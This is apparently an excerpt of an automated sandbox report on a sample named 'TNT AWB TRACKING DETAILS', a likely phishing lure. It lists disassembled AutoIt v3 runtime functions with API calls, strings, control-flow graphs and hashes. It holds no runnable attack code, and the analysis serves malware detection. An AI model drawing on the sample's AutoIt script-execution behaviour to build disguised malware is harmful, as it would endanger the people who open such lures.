                                                    • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                    • String ID:
                                                    • API String ID: 1500180987-0
                                                    • Opcode ID: 2c14a9255b604b02b761299a8301c3caa4481832658638a698649e82cc71cd4b
                                                    • Instruction ID: c156d4694b2c4cc8a73545f0510f1f622c6a56c52c344bc3d304f2ff06f61702
                                                    • Opcode Fuzzy Hash: 2c14a9255b604b02b761299a8301c3caa4481832658638a698649e82cc71cd4b
                                                    • Instruction Fuzzy Hash: 8CC14BB1E00229AADF21DF95DC85EDEBBBCEF45310F0040AAF609E7141EB709A459F65
                                                    Function 00EC3015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73windowregistryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • GetSysColorBrush.USER32(0000000F), ref: 00EC3074
                                                    • RegisterClassExW.USER32(00000030), ref: 00EC309E
                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00EC30AF
                                                    • InitCommonControlsEx.COMCTL32(?), ref: 00EC30CC
                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00EC30DC
                                                    • LoadIconW.USER32(000000A9), ref: 00EC30F2
                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00EC3101
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                    • API String ID: 2914291525-1005189915
                                                    • Opcode ID: 33aa434578d347dffff084270fdb6f1f106b634b9a44b7d4cda727a795287b91
                                                    • Instruction ID: 83eb9a72e0040f19ff57657a91faeb212c3269239a95159056b0cbe06cff9654
                                                    • Opcode Fuzzy Hash: 33aa434578d347dffff084270fdb6f1f106b634b9a44b7d4cda727a795287b91
                                                    • Instruction Fuzzy Hash: 85316775844349AFDB10DFA4DC88AD9BFF0FB1A710F14002EE980E62A0D3B90589DF51
                                                    Function 00EC3041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • GetSysColorBrush.USER32(0000000F), ref: 00EC3074
                                                    • RegisterClassExW.USER32(00000030), ref: 00EC309E
                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00EC30AF
                                                    • InitCommonControlsEx.COMCTL32(?), ref: 00EC30CC
                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00EC30DC
                                                    • LoadIconW.USER32(000000A9), ref: 00EC30F2
                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00EC3101
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                    • API String ID: 2914291525-1005189915
                                                    • Opcode ID: 4bbe1bc266083d06212a35f80561ebbf51fee17cfaccba0398a7df6302f665df
                                                    • Instruction ID: ad3e98d6b3b0618275e43733986d7da14195030992b2d94fea1664cfaf6ab19b
                                                    • Opcode Fuzzy Hash: 4bbe1bc266083d06212a35f80561ebbf51fee17cfaccba0398a7df6302f665df
                                                    • Instruction Fuzzy Hash: B621C5B5D5121CAFDB00DFA4EC49BDDBBF4FB09B00F00412AF915A62A0D7B54548AF91
                                                    Function 00EC708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                      • Part of subcall function 00EC4706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00F852F8,?,00EC37AE,?), ref: 00EC4724
                                                      • Part of subcall function 00EE050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00EC7165), ref: 00EE052D
                                                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00EC71A8
                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00EFE8C8
                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00EFE909
                                                    • RegCloseKey.ADVAPI32(?), ref: 00EFE947
                                                    • _wcscat.LIBCMT ref: 00EFE9A0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                    • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                    • API String ID: 2673923337-2727554177
                                                    • Opcode ID: 1f3d99433d17bb7dfc1e5b0fdf34c3c4381a573d43f3d86ae1ba993b483d4d8d
                                                    • Instruction ID: 67998dbeab3df89be8392831c3acbfb428877c776656b7df706d9c16abf310ec
                                                    • Opcode Fuzzy Hash: 1f3d99433d17bb7dfc1e5b0fdf34c3c4381a573d43f3d86ae1ba993b483d4d8d
                                                    • Instruction Fuzzy Hash: A6719C711083099AC700EF25EC41EABBBE8FF89310B40596EF584E72B1DB71A949DB52
                                                    Function 00EC3A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • GetSysColorBrush.USER32(0000000F), ref: 00EC3A50
                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00EC3A5F
                                                    • LoadIconW.USER32(00000063), ref: 00EC3A76
                                                    • LoadIconW.USER32(000000A4), ref: 00EC3A88
                                                    • LoadIconW.USER32(000000A2), ref: 00EC3A9A
                                                    • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00EC3AC0
                                                    • RegisterClassExW.USER32(?), ref: 00EC3B16
                                                      • Part of subcall function 00EC3041: GetSysColorBrush.USER32(0000000F), ref: 00EC3074
                                                      • Part of subcall function 00EC3041: RegisterClassExW.USER32(00000030), ref: 00EC309E
                                                      • Part of subcall function 00EC3041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00EC30AF
                                                      • Part of subcall function 00EC3041: InitCommonControlsEx.COMCTL32(?), ref: 00EC30CC
                                                      • Part of subcall function 00EC3041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00EC30DC
                                                      • Part of subcall function 00EC3041: LoadIconW.USER32(000000A9), ref: 00EC30F2
                                                      • Part of subcall function 00EC3041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00EC3101
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                    • String ID: #$0$AutoIt v3
                                                    • API String ID: 423443420-4155596026
                                                    • Opcode ID: f1875a70e4f90914e1b0ddf75fa3bb205fd671f3180722a8f17fbf822e6c7962
                                                    • Instruction ID: 3ed19f0c28c6714813443825ffd353d4d131578c2f3940be692f5a5bb5f489f7
                                                    • Opcode Fuzzy Hash: f1875a70e4f90914e1b0ddf75fa3bb205fd671f3180722a8f17fbf822e6c7962
                                                    • Instruction Fuzzy Hash: 13213EB590030CAFEB10DFA4ED09BAD7BB0EB09B15F004119E504A62A1D7B65954AF84
                                                    Function 00EC3633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 767 ec3633-ec3681 769 ec36e1-ec36e3 767->769 770 ec3683-ec3686 767->770 769->770 771 ec36e5 769->771 772 ec3688-ec368f 770->772 773 ec36e7 770->773 774 ec36ca-ec36d2 DefWindowProcW 771->774 777 ec374b-ec3753 PostQuitMessage 772->777 778 ec3695-ec369a 772->778 775 ec36ed-ec36f0 773->775 776 efd0cc-efd0fa call ed1070 call ed1093 773->776 782 ec36d8-ec36de 774->782 783 ec3715-ec373c SetTimer RegisterWindowMessageW 775->783 784 ec36f2-ec36f3 775->784 810 efd0ff-efd106 776->810 781 ec3711-ec3713 777->781 779 efd154-efd168 call f22527 778->779 780 ec36a0-ec36a2 778->780 779->781 804 efd16e 779->804 787 ec36a8-ec36ad 780->787 788 ec3755-ec3764 call ec44a0 780->788 781->782 783->781 789 ec373e-ec3749 CreatePopupMenu 783->789 791 efd06f-efd072 784->791 792 ec36f9-ec370c KillTimer call ec443a call ec3114 784->792 794 efd139-efd140 787->794 795 ec36b3-ec36b8 787->795 788->781 789->781 798 efd0a8-efd0c7 MoveWindow 791->798 799 efd074-efd076 791->799 792->781 794->774 809 efd146-efd14f call f17c36 794->809 802 ec36be-ec36c4 795->802 803 efd124-efd134 call f22d36 795->803 798->781 806 efd078-efd07b 799->806 807 efd097-efd0a3 SetFocus 799->807 802->774 802->810 803->781 804->774 806->802 811 efd081-efd092 call ed1070 806->811 807->781 809->774 810->774 816 efd10c-efd11f call ec443a call ec434a 810->816 811->781 816->774
                                                    APIs
                                                    • DefWindowProcW.USER32(?,?,?,?), ref: 00EC36D2
                                                    • KillTimer.USER32(?,00000001), ref: 00EC36FC
                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00EC371F
                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00EC372A
                                                    • CreatePopupMenu.USER32 ref: 00EC373E
                                                    • PostQuitMessage.USER32(00000000), ref: 00EC374D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                    • String ID: TaskbarCreated
                                                    • API String ID: 129472671-2362178303
                                                    • Opcode ID: f37a5f1938c77b0e12913af5e9e10973cec4a9dc0dea4d48de76eb33844976bc
                                                    • Instruction ID: b7f47ed47cf8aa1ad1a0e1899ed395a2bcda144e97dfe1f558d99278e1967384
                                                    • Opcode Fuzzy Hash: f37a5f1938c77b0e12913af5e9e10973cec4a9dc0dea4d48de76eb33844976bc
                                                    • Instruction Fuzzy Hash: DB417DB120450DBBCB10AF74EE09FFA3B95E700305F10612EF906F62A2CB669D06B361
                                                    Function 00EC3766 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                    • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                                    • API String ID: 1825951767-3513169116
                                                    • Opcode ID: d0f30bf473b6a078387e772f39d3700a51520cb5b66eb98d2b7b4fba067a7dbe
                                                    • Instruction ID: 867abb04020f17a127a3b03d386473082530dd230a5cca28700114a7c69e2563
                                                    • Opcode Fuzzy Hash: d0f30bf473b6a078387e772f39d3700a51520cb5b66eb98d2b7b4fba067a7dbe
                                                    • Instruction Fuzzy Hash: ACA1707290022D9ADB04EBA0DE55FEEBBB9BF54300F00142DF416B7192DF759A0ACB60
                                                    Function 00EC39D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1019 ec39d5-ec3a45 CreateWindowExW * 2 ShowWindow * 2
                                                    APIs
                                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00EC3A03
                                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00EC3A24
                                                    • ShowWindow.USER32(00000000,?,?), ref: 00EC3A38
                                                    • ShowWindow.USER32(00000000,?,?), ref: 00EC3A41
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Window$CreateShow
                                                    • String ID: AutoIt v3$edit
                                                    • API String ID: 1584632944-3779509399
                                                    • Opcode ID: 109ef92eb9f4f67d29c30b40073c7b7f0abb18de32530b021f8e7d56c197836f
                                                    • Instruction ID: 8b9ca7cb9ac26d3f6bf9fbf858096f26ff4b75da94740a181369561d6b9d7681
                                                    • Opcode Fuzzy Hash: 109ef92eb9f4f67d29c30b40073c7b7f0abb18de32530b021f8e7d56c197836f
                                                    • Instruction Fuzzy Hash: DCF03A705402987FEB3157636C09EBB3E7DD7C7F50B00002AB904A2270CA650800EBB0
                                                    Function 00EC407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1020 ec407c-ec4092 1021 ec416f-ec4173 1020->1021 1022 ec4098-ec40ad call ec7a16 1020->1022 1025 efd3c8-efd3d7 LoadStringW 1022->1025 1026 ec40b3-ec40d3 call ec7bcc 1022->1026 1029 efd3e2-efd3fa call ec7b2e call ec6fe3 1025->1029 1026->1029 1030 ec40d9-ec40dd 1026->1030 1039 ec40ed-ec416a call ee2de0 call ec454e call ee2dbc Shell_NotifyIconW call ec5904 1029->1039 1042 efd400-efd41e call ec7cab call ec6fe3 call ec7cab 1029->1042 1032 ec4174-ec417d call ec8047 1030->1032 1033 ec40e3-ec40e8 call ec7b2e 1030->1033 1032->1039 1033->1039 1039->1021 1042->1039
                                                    APIs
                                                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00EFD3D7
                                                      • Part of subcall function 00EC7BCC: _memmove.LIBCMT ref: 00EC7C06
                                                    • _memset.LIBCMT ref: 00EC40FC
                                                    • _wcscpy.LIBCMT ref: 00EC4150
                                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00EC4160
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                    • String ID: Line:
                                                    • API String ID: 3942752672-1585850449
                                                    • Opcode ID: 150d61ba60e8d44c72ff0b85f27fe3254d52c03541d14931fc208f36d2df7cb2
                                                    • Instruction ID: 280e4c0fa95c030b9dc90df77d796e7a67dae4c901133618d4e72a2a06d52cc4
                                                    • Opcode Fuzzy Hash: 150d61ba60e8d44c72ff0b85f27fe3254d52c03541d14931fc208f36d2df7cb2
                                                    • Instruction Fuzzy Hash: 1E31CB71108308ABD320EB60DD46FEB77D8AB54714F10591EF6C9A20A1EF71A64ACB93
                                                    Function 00EE541D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1055 ee541d-ee5436 1056 ee5438-ee543d 1055->1056 1057 ee5453 1055->1057 1056->1057 1059 ee543f-ee5441 1056->1059 1058 ee5455-ee545b 1057->1058 1060 ee545c-ee5461 1059->1060 1061 ee5443-ee5448 call ee8b28 1059->1061 1063 ee546f-ee5473 1060->1063 1064 ee5463-ee546d 1060->1064 1071 ee544e call ee8db6 1061->1071 1067 ee5475-ee5480 call ee2de0 1063->1067 1068 ee5483-ee5485 1063->1068 1064->1063 1066 ee5493-ee54a2 1064->1066 1069 ee54a9 1066->1069 1070 ee54a4-ee54a7 1066->1070 1067->1068 1068->1061 1073 ee5487-ee5491 1068->1073 1074 ee54ae-ee54b3 1069->1074 1070->1074 1071->1057 1073->1061 1073->1066 1077 ee559c-ee559f 1074->1077 1078 ee54b9-ee54c0 1074->1078 1077->1058 1079 ee54c2-ee54ca 1078->1079 1080 ee5501-ee5503 1078->1080 1079->1080 1081 ee54cc 1079->1081 1082 ee556d-ee556e call ef0ba7 1080->1082 1083 ee5505-ee5507 1080->1083 1084 ee55ca 1081->1084 1085 ee54d2-ee54d4 1081->1085 1094 ee5573-ee5577 1082->1094 1087 ee552b-ee5536 1083->1087 1088 ee5509-ee5511 1083->1088 1093 ee55ce-ee55d7 1084->1093 1091 ee54db-ee54e0 1085->1091 1092 ee54d6-ee54d8 1085->1092 1089 ee553a-ee553d 1087->1089 1090 ee5538 1087->1090 1095 ee5513-ee551f 1088->1095 1096 ee5521-ee5525 1088->1096 1099 ee553f-ee554b call ee46e6 call ef0e5b 1089->1099 1100 ee55a4-ee55a8 1089->1100 1090->1089 1091->1100 1101 ee54e6-ee54ff call ef0cc8 1091->1101 1092->1091 1093->1058 1094->1093 1097 ee5579-ee557e 1094->1097 1098 ee5527-ee5529 1095->1098 1096->1098 1097->1100 1102 ee5580-ee5591 1097->1102 1098->1089 1116 ee5550-ee5555 1099->1116 1103 ee55ba-ee55c5 call ee8b28 1100->1103 1104 ee55aa-ee55b7 call ee2de0 1100->1104 1115 ee5562-ee556b 1101->1115 1107 ee5594-ee5596 1102->1107 1103->1071 1104->1103 1107->1077 1107->1078 1115->1107 1117 ee55dc-ee55e0 1116->1117 1118 ee555b-ee555e 1116->1118 1117->1093 1118->1084 1119 ee5560 1118->1119 1119->1115
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                    • String ID:
                                                    • API String ID: 1559183368-0
                                                    • Opcode ID: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                                    • Instruction ID: 2367017e85ee70285972583567bcbfad44a05913f9b150d1eaa139df5cf3f0d5
                                                    • Opcode Fuzzy Hash: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                                    • Instruction Fuzzy Hash: C851BA72A00B8DDBCB248FAADC405AE77B6AF4032DF249729F835B62D1D7709D548B40
                                                    Function 00EC686A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1120 ec686a-ec6891 call ec4ddd 1123 ec6897-ec68a5 call ec4ddd 1120->1123 1124 efe031-efe041 call f2955b 1120->1124 1123->1124 1131 ec68ab-ec68b1 1123->1131 1127 efe046-efe048 1124->1127 1129 efe04a-efe04d call ec4e4a 1127->1129 1130 efe067-efe0af call ee0db6 1127->1130 1135 efe052-efe061 call f242f8 1129->1135 1140 efe0d4 1130->1140 1141 efe0b1-efe0bb 1130->1141 1134 ec68b7-ec68d9 call ec6a8c 1131->1134 1131->1135 1135->1130 1143 efe0d6-efe0e9 1140->1143 1144 efe0cf-efe0d0 1141->1144 1145 efe0ef 1143->1145 1146 efe260-efe271 call ee2d55 call ec4e4a 1143->1146 1147 efe0bd-efe0cc 1144->1147 1148 efe0d2 1144->1148 1149 efe0f6-efe0f9 call ec7480 1145->1149 1157 efe273-efe283 call ec7616 call ec5d9b 1146->1157 1147->1144 1148->1143 1154 efe0fe-efe120 call ec5db2 call f273e9 1149->1154 1164 efe134-efe13e call f273d3 1154->1164 1165 efe122-efe12f 1154->1165 1171 efe288-efe2b8 call f1f7a1 call ee0e2c call ee2d55 call ec4e4a 1157->1171 1173 efe158-efe162 call f273bd 1164->1173 1174 efe140-efe153 1164->1174 1167 efe227-efe237 call ec750f 1165->1167 1167->1154 1177 efe23d-efe25a call ec735d 1167->1177 1171->1157 1181 efe176-efe180 call ec5e2a 1173->1181 1182 efe164-efe171 1173->1182 1174->1167 1177->1146 1177->1149 1181->1167 1189 efe186-efe19e call f1f73d 1181->1189 1182->1167 1195 efe1c1-efe1c4 1189->1195 1196 efe1a0-efe1bf call ec7de1 call ec5904 1189->1196 1197 efe1c6-efe1e1 call ec7de1 call ec6839 call ec5904 1195->1197 1198 efe1f2-efe1f5 1195->1198 1219 efe1e2-efe1f0 call ec5db2 1196->1219 1197->1219 1202 efe1f7-efe200 call f1f65e 1198->1202 1203 efe215-efe218 call f2737f 1198->1203 1202->1171 1214 efe206-efe210 call ee0e2c 1202->1214 1208 efe21d-efe226 call ee0e2c 1203->1208 1208->1167 1214->1154 1219->1208
                                                    APIs
                                                      • Part of subcall function 00EC4DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00F852F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00EC4E0F
                                                    • _free.LIBCMT ref: 00EFE263
                                                    • _free.LIBCMT ref: 00EFE2AA
                                                      • Part of subcall function 00EC6A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00EC6BAD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: _free$CurrentDirectoryLibraryLoad
                                                    • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                    • API String ID: 2861923089-1757145024
                                                    • Opcode ID: 9f264793d613d92d8ab0bb5c73de3e2714892a70be2118252c3df8bab528034c
                                                    • Instruction ID: 45cbbae0c4aaaf21fcbaef75d8e7a688516cb5ba06bf0c3612a9a8fbe3adc2aa
                                                    • Opcode Fuzzy Hash: 9f264793d613d92d8ab0bb5c73de3e2714892a70be2118252c3df8bab528034c
                                                    • Instruction Fuzzy Hash: 28916E7190021DAFCF04EFA4CC919EEB7B8FF05314B10542AF916BB2A1EB75A946CB50
